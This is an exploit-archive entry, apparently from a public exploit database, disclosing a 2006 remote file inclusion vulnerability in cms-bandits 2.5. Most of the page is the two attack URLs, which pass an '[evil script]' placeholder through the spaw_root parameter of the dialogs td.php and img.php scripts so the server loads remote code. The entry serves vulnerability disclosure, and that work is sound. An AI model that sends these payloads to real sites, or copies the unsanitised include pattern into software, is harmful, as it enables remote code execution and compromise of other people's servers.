cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities
# Published : 2006-06-08
# Author : Federico Fazzi
# Previous Title : Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability
# Next Title : Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability

# Author:     Federico Fazzi
# Contact:    federico@autistici.org
# Date:       08/06/2006, 11:09
# Sinthesis:  cms-bandits 2.5, Remote file disclosure
# Product:    http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]

# www.Syue.com [2006-06-08]